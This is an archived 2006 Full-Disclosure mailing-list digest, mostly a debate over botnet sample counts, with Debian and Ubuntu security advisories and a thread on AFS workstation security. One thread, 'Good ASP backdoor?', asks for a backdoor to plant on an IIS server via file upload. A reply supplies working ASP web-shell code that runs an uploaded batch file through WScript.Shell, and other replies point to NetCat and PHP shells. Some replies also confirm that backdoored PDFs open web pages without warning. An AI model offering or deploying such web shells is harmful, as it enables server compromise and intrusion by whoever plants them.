Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/15/06, Richard Golodner <[EMAIL PROTECTED]> wrote: > As we had seen today everybody has an opinion about how the Botnet > metrics are computed. I have been reading Gadi's post for many years now and > believe he is a very knowledgeable and competent person. Give the guy a > break, he has supplied us with very useful and interesting facts on Botnets > and that is a lot more than I see coming from all the rest of the group > involved in this thread. > Where is everyone else's data?\ I have data collected over 5 class B's via darknet. Of course they are all 10.1.x.x, with only 1 virtual host per /16. Seems lke I am guessing. Not that I dont trust G, just wanted to see if I could goad him into releasing some data (as has been called for) -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
As we had seen today everybody has an opinion about how the Botnet metrics are computed. I have been reading Gadi's post for many years now and believe he is a very knowledgeable and competent person. Give the guy a break, he has supplied us with very useful and interesting facts on Botnets and that is a lot more than I see coming from all the rest of the group involved in this thread. Where is everyone else's data? Richard Golodner ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1160-2[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze September 15th, 2006http://www.debian.org/security/faq - -- Package: mozilla Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2006-2779 CVE-2006-3805 CVE-2006-3806 CVE-2006-3807 CVE-2006-3808 CVE-2006-3809 CVE-2006-3810 CERT advisories: VU#466673 VU#655892 VU#687396 VU#876420 VU#911004 BugTraq IDs: 18228 19181 The latest security updates of Mozilla introduced a regression that led to a disfunctional attachment panel which warrants a correction to fix this issue. For reference please find below the original advisory text: Several security related problems have been discovered in Mozilla and derived products. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2779 Mozilla team members discovered several crashes during testing of the browser engine showing evidence of memory corruption which may also lead to the execution of arbitrary code. The last bit of this problem will be corrected with the next update. You can prevent any trouble by disabling Javascript. [MFSA-2006-32] CVE-2006-3805 The Javascript engine might allow remote attackers to execute arbitrary code. [MFSA-2006-50] CVE-2006-3806 Multiple integer overflows in the Javascript engine might allow remote attackers to execute arbitrary code. [MFSA-2006-50] CVE-2006-3807 Specially crafted Javascript allows remote attackers to execute arbitrary code. [MFSA-2006-51] CVE-2006-3808 Remote AutoConfig (PAC) servers could execute code with elevated privileges via a specially crafted PAC script. [MFSA-2006-52] CVE-2006-3809 Scripts with the UniversalBrowserRead privilege could gain UniversalXPConnect privileges and possibly execute code or obtain sensitive data. [MFSA-2006-53] CVE-2006-3810 A cross-site scripting vulnerability allows remote attackers to inject arbitrary web script or HTML. [MFSA-2006-54] For the stable distribution (sarge) these problems have been fixed in version 1.7.8-1sarge7.2.2. For the unstable distribution (sid) these problems won't be fixed since its end of lifetime has been reached and the package will soon be removed. We recommend that you upgrade your mozilla package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2.dsc Size/MD5 checksum: 1131 bb39933b4dcb63f6f986f0da3ab9461e http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2.diff.gz Size/MD5 checksum: 532293 5a86930497b980b25e7f8e5cd6305ad0 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8.orig.tar.gz Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 168074 553ba25202552c16c02cfdcf94bbc1c4 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 147582 e953bc1da64aaab9b50ef2bd357279b8 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 184944 18bfed4502c3e8a50cac55bd69cf6f20 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 857148 c9f560d4ad706a1e50dbd2db21978427 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 1042 9de55ee42dcc1c484a801623ac29c80d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 11484766 4b31f8553a2ee93057858b35cdc522d9 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge7.2.2_alpha.deb Size/MD5 checksum: 403274 da75d1e0207b660ae42d7d1eb0b99617 http://security.debian.org/pool/updates/m
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
I cant' present data, but I'll opinion that Gadi is pretty much on track with figures and numbers. In fact his stat's are on the lower side our current intel reports indicates overall incidents by " Zombie machines on organization's network/ bots/use of network by BotNets" = 20%. which is ANY NET based data sets for incident mngt. this indiates a 36% increase from July 2004 - June 2005 with a mean "unknown base" being equated to 15.1%. This pecent implies the rate of fresh nodes being propagated, or rather the rate of growth for Botnets!! hypothecially, you can if flatline these stats against whatever date sets you have ...I'll leave you all to you better judgements :)- /pd On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote: On Thu, 14 Sep 2006, Dude VanWinkle wrote:> On 9/14/06, Gadi Evron < [EMAIL PROTECTED]> wrote:> > This counts bot samples. Whether they are variants (changed) or> > insignificant changes such as only the IP address to the C&C, they are> > counted as unique. >> So if you have multiple machines NAT'ed under one IP, that is one pot.> err bot eh? OK.And if I see 10 bots usingthe same address on a dynamic range.. ever heardof DHCP? The number crunching schemes arenever perfect but they are pretty good.I count, much like many others, unique IPs. A bot is defined as aninstance of an installed Trojan horse. One machine mayhave (and probablydoes have) several. We can count IPs and we do.3.5 Million hosts, note, for spam alone. The total population count ismind-boggling. I believe spamhaus has it pinned at 3.2 millions, otherhave higher numbers. That's about where it is for EMAIL based spam, perday. >> >> > This is why we now run different sharing projects between established> > honey nets.>> So you dont count botnets that detect honeynets eh?>Honey pot detection is an interesting field, I am familiar with it and even consider myself somewhat of a knowledgable person on it, but thereare those who research it actively.As interesting as it may be, it's not much of a field yet, sorry tosay. Honey pots of different kinds work marvelously. Not all our sources for samples are the same. It would be silly of me todivulge them all (especially as personally I have no use for samples thesedays and others do). Still, we can only report what we see, what do you see?> > > or other trivial changes? Do you attempt to correct for complex polymorphic> > > variants?>> Nah, just contributors who dont all have publicly routable IP's and > this herders that know about VMware/Honeywall>>> > There aren't many of those.. really. :)>> Really? Ok.>> > > > Further, the anti virus world sees about the same numbers. >> Using the same methods?>And their reporting user-base, alliances and sharing artners, and whatnot. Yes. D o you think all bots are extremely smart rootkits? I amquite happy to say most botnets are nothing if not the re-use of old code, which is freely available, using the same old methods.There are other types of malware out there.> > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of> > > > 15K avg bot samples a month, as well. >> Gotcha, you MS and Symantec share numbers based of who doesnt know how> to disable your detection methodsYou assume too much Dude.Still, you are right, 100%. I can only detect what I know how to detect. But samples are not the only way to follow botnets, and there aremany ends on how to approach one problems.Cryptic? I suppose, but hey, Google for methods, see what you find, andtell me what you think. I believe we have pretty good coverage, but I also need to admit most anti viruses do not cover bot detection very well.> I am just saying, the larger the organization, the sharper the focus> from the other side. Maybe a loose coalition of known non-bullshitters > would have a more accurate picture.The picture you got is pretty accurate. Don't take my word for itthough. I am happy to examine and share (as much as I can, which is morethan enough to show the numbers (lower numbers) we chose to show in the article.What numbers do you need? What makes you doubt what we have given? I'd bemore than happy to answer any question you have or counter-numbers youhave, but your love for me is as irrelevant as you calling me a *** when you don't show your own data or challange mine withactual questions like Dave (the other dave) did.Thanks, Gadi.> still love ja tho Gadi,>> -JP >> > >> > > Got a link/quote/reference to that? Does Ziv explain the methodology that> > > they are using?> >> > Nope, but I will ask. Most of the numbers I get are at 15K. I can only > > prove *on my own* without relying on other sources, as reliable as they> > may be, 12K, which is the number we mentioned in the article. We were> > being conservative due to that reason, but the number is higher. > >> > > > I don't know what others may be seeing, but this is our best estimate> > > > as to what's going on with the number of unique samples released> > > > every mont
[Full-disclosure] Re: Backdooring PDF Files
It is really take effect in my virtual machine: xp sp2+pdf reader version 7.0.1.2005030700 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dude VanWinkle wrote: > On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote: > > This counts bot samples. Whether they are variants (changed) or > > insignificant changes such as only the IP address to the C&C, they are > > counted as unique. > > So if you have multiple machines NAT'ed under one IP, that is one pot. > err bot eh? OK. And if I see 10 bots usingthe same address on a dynamic range.. ever heard of DHCP? The number crunching schemes arenever perfect but they are pretty good. I count, much like many others, unique IPs. A bot is defined as an instance of an installed Trojan horse. One machine mayhave (and probably does have) several. We can count IPs and we do. 3.5 Million hosts, note, for spam alone. The total population count is mind-boggling. I believe spamhaus has it pinned at 3.2 millions, other have higher numbers. That's about where it is for EMAIL based spam, per day. > > > > > This is why we now run different sharing projects between established > > honey nets. > > So you dont count botnets that detect honeynets eh? > Honey pot detection is an interesting field, I am familiar with it and even consider myself somewhat of a knowledgable person on it, but there are those who research it actively. As interesting as it may be, it's not much of a field yet, sorry to say. Honey pots of different kinds work marvelously. Not all our sources for samples are the same. It would be silly of me to divulge them all (especially as personally I have no use for samples these days and others do). Still, we can only report what we see, what do you see? > > > or other trivial changes? Do you attempt to correct for complex > > > polymorphic > > > variants? > > Nah, just contributors who dont all have publicly routable IP's and > this herders that know about VMware/Honeywall > > > > There aren't many of those.. really. :) > > Really? Ok. > > > > > Further, the anti virus world sees about the same numbers. > > Using the same methods? > And their reporting user-base, alliances and sharing artners, and what not. Yes. D o you think all bots are extremely smart rootkits? I am quite happy to say most botnets are nothing if not the re-use of old code, which is freely available, using the same old methods. There are other types of malware out there. > > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of > > > > 15K avg bot samples a month, as well. > > Gotcha, you MS and Symantec share numbers based of who doesnt know how > to disable your detection methods You assume too much Dude. Still, you are right, 100%. I can only detect what I know how to detect. But samples are not the only way to follow botnets, and there are many ends on how to approach one problems. Cryptic? I suppose, but hey, Google for methods, see what you find, and tell me what you think. I believe we have pretty good coverage, but I also need to admit most anti viruses do not cover bot detection very well. > I am just saying, the larger the organization, the sharper the focus > from the other side. Maybe a loose coalition of known non-bullshitters > would have a more accurate picture. The picture you got is pretty accurate. Don't take my word for it though. I am happy to examine and share (as much as I can, which is more than enough to show the numbers (lower numbers) we chose to show in the article. What numbers do you need? What makes you doubt what we have given? I'd be more than happy to answer any question you have or counter-numbers you have, but your love for me is as irrelevant as you calling me a *** when you don't show your own data or challange mine with actual questions like Dave (the other dave) did. Thanks, Gadi. > still love ja tho Gadi, > > -JP > > > > > > > Got a link/quote/reference to that? Does Ziv explain the methodology > > > that > > > they are using? > > > > Nope, but I will ask. Most of the numbers I get are at 15K. I can only > > prove *on my own* without relying on other sources, as reliable as they > > may be, 12K, which is the number we mentioned in the article. We were > > being conservative due to that reason, but the number is higher. > > > > > > I don't know what others may be seeing, but this is our best estimate > > > > as to what's going on with the number of unique samples released > > > > every month. > > > > > > > > Jose Nazarijo from Arbor replied on the botnets list that he sees > > > > similar numbers. > > > > > > > > I hope this helps... what are you looking to hear? > > > > > > Some kind of explanation for the huge disjunction between these numbers > > > and our instinctive ideas about what's possible. Of course, being > > > > I followed you this far, but to be honest, your ideas (what are > > they?) are indeed very far from reality... :) > > > > > un-worked-out intuitive estimates, such ideas are of course entirely > > > likely > > > to be off the mark, but off the mark by two orders of magnitude? Hence
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote: > This counts bot samples. Whether they are variants (changed) or > insignificant changes such as only the IP address to the C&C, they are > counted as unique. So if you have multiple machines NAT'ed under one IP, that is one pot. err bot eh? OK. > > This is why we now run different sharing projects between established > honey nets. So you dont count botnets that detect honeynets eh? > > or other trivial changes? Do you attempt to correct for complex polymorphic > > variants? Nah, just contributors who dont all have publicly routable IP's and this herders that know about VMware/Honeywall > There aren't many of those.. really. :) Really? Ok. > > > Further, the anti virus world sees about the same numbers. Using the same methods? > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of > > > 15K avg bot samples a month, as well. Gotcha, you MS and Symantec share numbers based of who doesnt know how to disable your detection methods I am just saying, the larger the organization, the sharper the focus from the other side. Maybe a loose coalition of known non-bullshitters would have a more accurate picture. still love ja tho Gadi, -JP > > > > Got a link/quote/reference to that? Does Ziv explain the methodology that > > they are using? > > Nope, but I will ask. Most of the numbers I get are at 15K. I can only > prove *on my own* without relying on other sources, as reliable as they > may be, 12K, which is the number we mentioned in the article. We were > being conservative due to that reason, but the number is higher. > > > > I don't know what others may be seeing, but this is our best estimate > > > as to what's going on with the number of unique samples released > > > every month. > > > > > > Jose Nazarijo from Arbor replied on the botnets list that he sees > > > similar numbers. > > > > > > I hope this helps... what are you looking to hear? > > > > Some kind of explanation for the huge disjunction between these numbers > > and our instinctive ideas about what's possible. Of course, being > > I followed you this far, but to be honest, your ideas (what are > they?) are indeed very far from reality... :) > > > un-worked-out intuitive estimates, such ideas are of course entirely likely > > to be off the mark, but off the mark by two orders of magnitude? Hence the > > request for more methodological details. > > No problem, I quite understand. There is not that much science into it > really: > "Yo, how many unique samples do you see?" as a lone dataset if they won't > share. > "Yo, how many unique samples do we all see?" if they share. > "Yo, how many unique samples do others see?" > > AVG is 15K, I can prove *on my own* 12K... counting banking/phishing > trojan horses, general purpose trojans, dialers, etc (from the large bot > families). > > Gadi. > > > > > > cheers, > > DaveK > > -- > > Can't think of a witty .sigline today > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > > All list and server information are public and available to law enforcement > > upon request. > > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/14/06, Jose Nazario <[EMAIL PROTECTED]> wrote: > i guess i'm curious about your position, then, and what you're meaning by > "our instinctive ideas about what's possible". You see, the universe operates with a distinct prejudice towards individuals with an inclination towards lunacy... they should have covered this in douchebaggery 101 f'er cryin' out loud! -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good ASP backdoor?
Nothing spiffing but it works, <%@ Page language="VB" Debug="true" aspcompat="true" %> <% shell("C:\Program Files\WebApp\Uploads\owned.bat") %> Sub blah() Dim SpawnShell = server.CreateObject("WScript.Shell") SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat") End sub then just upload your tools and run via the bat file. Does the job. On 14/09/06, Jason Miller <[EMAIL PROTECTED]> wrote: > http://replica-solutions.de/ > has some php based ones, check it out > > On 9/14/06, Exibar < [EMAIL PROTECTED]> wrote: > > NetCat is a tried and true favorite > > > > > > - Original Message - > > From: "Lachniet, Mark" <[EMAIL PROTECTED]> > > To: > > Sent: Thursday, September 14, 2006 2:44 PM > > Subject: [Full-disclosure] Good ASP backdoor? > > > > > > > Can anyone suggest a good backdoor for placing on a IIS server when you > > > can upload a file to document root? For exapmle an all-in-one tool with > > > upload, download, command execution, etc. There are several basic ones > > > out there - I was wondering if anyone ever wrote a really spiffy one. > > > > > > Thanks in advance, > > > > > > Mark Lachniet > > > > > > ___ > > > Full-Disclosure - We believe in it. > > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good ASP backdoor?
http://replica-solutions.de/has some php based ones, check it outOn 9/14/06, Exibar < [EMAIL PROTECTED]> wrote:NetCat is a tried and true favorite- Original Message - From: "Lachniet, Mark" <[EMAIL PROTECTED]>To:Sent: Thursday, September 14, 2006 2:44 PMSubject: [Full-disclosure] Good ASP backdoor?> Can anyone suggest a good backdoor for placing on a IIS server when you> can upload a file to document root? For exapmle an all-in-one tool with > upload, download, command execution, etc. There are several basic ones> out there - I was wondering if anyone ever wrote a really spiffy one.>> Thanks in advance,>> Mark Lachniet >> ___> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/>>___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote: > Can you go into detail about the methodology you're using here? How do > you "get to a number" of 15,000 from a number "between 200 and 800"? > Is this a statistical extrapolation, or are you saying that your > honeynet gets 200 to 800 unique samples a month, and so does that one > over there, and that one, and that one and they all add up to 15000? > Do you attempt to correct for variants that are simply re-packed using a > different compressor, or other trivial changes? Do you attempt to > correct for complex polymorphic variants? my numbers are based on unique MD5 values. the bulk of those are minor variants on a theme, ie repackaged bots or reconfigured bots, maybe a new module thrown in or something. only a small handful, maybe a dozen or so, are really new bots every month. very rarely do we see new bots or new capabilities added. the last major change was the use of the MS06-040 netapi exploit. the bulk of the bot binaries i see are derivatives of well known families. very few new families emerge in any given timeframe, but in the HTTP bot world, we're starting to see people develop tools and reuse them. unique bot samples, ~12-15k or higher a month. many independent teams can back that ballpark figure up. new bot samples, truly new like i outlined above, is far less. about three orders of magnitude less. by the way, in this day and age the bulk of people do not bother with polymorphism. they achieve it not through the classic - and elegant - methods of self modifying code but instead by churning out new bots fast and furious. same end result, though: confuse the naive, static detection tools out thare. > Some kind of explanation for the huge disjunction between these numbers > and our instinctive ideas about what's possible. Of course, being > un-worked-out intuitive estimates, such ideas are of course entirely > likely to be off the mark, but off the mark by two orders of magnitude? > Hence the request for more methodological details. i guess i'm curious about your position, then, and what you're meaning by "our instinctive ideas about what's possible". it sounds like we're on the same page, but you may feel it's hyping the problem to talk about new bots based on unique MD5 values. it's not my favorite way of thinking about it, but it is easily underscored by a real-world fact: many AV vendors fail to detect the same bot source simply repackaged or re-configured (ie a new IRC server, everything else the same). hence, each new MD5 means a new detection hit for them. so, hype has a real-world backing, namely AV detection issues. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http://monkey.org/~jose/secnews.html http://www.wormblog.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote: > Can you go into detail about the methodology you're using here? How do > you "get to a number" of 15,000 from a number "between 200 and 800"? Is My comment here was in regard to what most honey nets see. > this a statistical extrapolation, or are you saying that your honeynet gets > 200 to 800 unique samples a month, and so does that one over there, and that > one, and that one and they all add up to 15000? Do you attempt to Yes. Also, some are large enough to get to that number, and there are other sources as well such as the AV community or the Microsoft data... as examples. > correct for variants that are simply re-packed using a different compressor, This counts bot samples. Whether they are variants (changed) or insignificant changes such as only the IP address to the C&C, they are counted as unique. This is why we now run different sharing projects between established honey nets. > or other trivial changes? Do you attempt to correct for complex polymorphic > variants? There aren't many of those.. really. :) > > Further, the anti virus world sees about the same numbers. > > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of > > 15K avg bot samples a month, as well. > > Got a link/quote/reference to that? Does Ziv explain the methodology that > they are using? Nope, but I will ask. Most of the numbers I get are at 15K. I can only prove *on my own* without relying on other sources, as reliable as they may be, 12K, which is the number we mentioned in the article. We were being conservative due to that reason, but the number is higher. > > I don't know what others may be seeing, but this is our best estimate > > as to what's going on with the number of unique samples released > > every month. > > > > Jose Nazarijo from Arbor replied on the botnets list that he sees > > similar numbers. > > > > I hope this helps... what are you looking to hear? > > Some kind of explanation for the huge disjunction between these numbers > and our instinctive ideas about what's possible. Of course, being I followed you this far, but to be honest, your ideas (what are they?) are indeed very far from reality... :) > un-worked-out intuitive estimates, such ideas are of course entirely likely > to be off the mark, but off the mark by two orders of magnitude? Hence the > request for more methodological details. No problem, I quite understand. There is not that much science into it really: "Yo, how many unique samples do you see?" as a lone dataset if they won't share. "Yo, how many unique samples do we all see?" if they share. "Yo, how many unique samples do others see?" AVG is 15K, I can prove *on my own* 12K... counting banking/phishing trojan horses, general purpose trojans, dialers, etc (from the large bot families). Gadi. > > cheers, > DaveK > -- > Can't think of a witty .sigline today > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law enforcement > upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backdooring PDF Files
On 9/14/06, Hugo Francisco González Robledo <[EMAIL PROTECTED]> wrote: > I think it depends on the context. > > Example 1 (backdoored1.pdf) : > > On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on > mozilla-firefox whitout warning. > On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without warning as well. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFS - The Ultimate Sulution?
Hi list, recently I found myself in an argument which I found interesting. This is why I want to pass it on to the list since neither me nor my friend were able to agree on this. Maybe the broader knowledge of this list will lighten up the matter a bit. Apart from this I think it might interest many of you. Core of the discussion is a corporate system with several workstations all attached to a single network. This network runs an AFS-server which is supplying the corporation's AFS-cell. Every workstation boots into a minimal environment which ask for username and password. Afterwards it uses these to connect to the AFS-Cell and boots one of several available System-Images which reside on the AFS-Server. (Both Linux (FC1) and Windows (2000) Images are available). After booting the OS several important folders and files are replaced with the user's own data (which only he can access due to Kerberos authentication). For instance the Linux image gets /etc/passwd, /etc/shadow, /home/$USER and some others replaced. The custom /etc/passwd and /etc/shadow will only contain the user himself and the root-account in order to prevent bruteforcing the passwords. It seems like this system is quite secure. Even if an attacker should gain root-access locally he would not be able to access anything he didn't own in the first place. (So to say other user's files residing in their private AFS folders.) Also he could cause no destruction to the system because the system is booted from the same Image every time. Even if he did something like rm -rf / he would only delete his private files in the home-folder. This is kind of a combination of RemoteBoot and AFS. The well known weakness of RemoteBoot is that - set the case the communication between the image-server is not encrypted - it is possible to supply forged images to the workstation. (E.g. by ARP-Spoofing the image-server.) AFS however uses Kerberos to authenticate and thus is considered secure. Now my friend claims that this system could go unmanaged for ages since the user's data would remain secure even if security holes were published and exploits released. This seems true. However I kind of refuse to believe that something this simple can truly be secure. The only hole I could come up with is that there would be a remote vulnerability which an attacker would use to access the running workstation of somebody else. However this seems unlikely and quite lame. Anyone up for anything more sophisticated? Thanks in advance and happy arguing. Paul ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good ASP backdoor?
NetCat is a tried and true favorite - Original Message - From: "Lachniet, Mark" <[EMAIL PROTECTED]> To: Sent: Thursday, September 14, 2006 2:44 PM Subject: [Full-disclosure] Good ASP backdoor? > Can anyone suggest a good backdoor for placing on a IIS server when you > can upload a file to document root? For exapmle an all-in-one tool with > upload, download, command execution, etc. There are several basic ones > out there - I was wondering if anyone ever wrote a really spiffy one. > > Thanks in advance, > > Mark Lachniet > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update
=== Ubuntu Security Notice USN-346-2 September 14, 2006 linux-restricted-modules-2.6.15 regression fix === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: avm-fritz-firmware-2.6.15-26 2.6.15.11-4 avm-fritz-kernel-source 2.6.15.11-4 fglrx-control 2.6.15.11-4 fglrx-kernel-source 2.6.15.11-4 linux-restricted-modules-2.6.15-26-3862.6.15.11-4 linux-restricted-modules-2.6.15-26-6862.6.15.11-4 linux-restricted-modules-2.6.15-26-amd64-generic 2.6.15.11-4 linux-restricted-modules-2.6.15-26-amd64-k8 2.6.15.11-4 linux-restricted-modules-2.6.15-26-amd64-xeon 2.6.15.11-4 nic-restricted-firmware-2.6.15-26-386-di 2.6.15.11-4 nic-restricted-firmware-2.6.15-26-amd64-generic-di2.6.15.11-4 nic-restricted-modules-2.6.15-26-386-di 2.6.15.11-4 nic-restricted-modules-2.6.15-26-amd64-generic-di 2.6.15.11-4 nvidia-glx2.6.15.11-4 nvidia-glx-dev2.6.15.11-4 nvidia-glx-legacy 2.6.15.11-4 nvidia-glx-legacy-dev 2.6.15.11-4 nvidia-kernel-source 2.6.15.11-4 nvidia-legacy-kernel-source 2.6.15.11-4 xorg-driver-fglrx 2.6.15.11-4 xorg-driver-fglrx-dev 2.6.15.11-4 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: USN-346-1 provided an updated Linux kernel to fix several security vulnerabilities. Unfortunately the update broke the binary 'nvidia' driver from linux-restricted-modules. This update corrects this problem. We apologize for the inconvenience. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11-4.diff.gz Size/MD5:87151 643e82286c057ba22dc6e206eb35bb29 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11-4.dsc Size/MD5: 3185 994d3417c1d9ec7eab79ea993cb37304 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11.orig.tar.gz Size/MD5: 97566445 8bb235f9119aed52797b057827756b8c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-common_2.6.15.11-4_all.deb Size/MD5:17844 f05d3a7a38b1c45959d6d19972e9dd68 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-26_3.11+2.6.15.11-4_amd64.deb Size/MD5: 474964 3caecd039a65b40abbb7e0992dfacaef http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.11-4_amd64.deb Size/MD5: 2404974 cb8229fe0f818d8a595c29d5d1d365be http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.11-4_amd64.deb Size/MD5:76148 dbbac55447617a2c29a5456bfb3ac956 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.11-4_amd64.deb Size/MD5: 510394 79c3e8fd94f52f8803bc40587f07e2ac http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-generic_2.6.15.11-4_amd64.deb Size/MD5: 6861180 6c3497ef198fe4f983a8fb7d644345eb http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-k8_2.6.15.11-4_amd64.deb Size/MD5: 6860656 014f045a30ed2ebffe4a95958bddf933 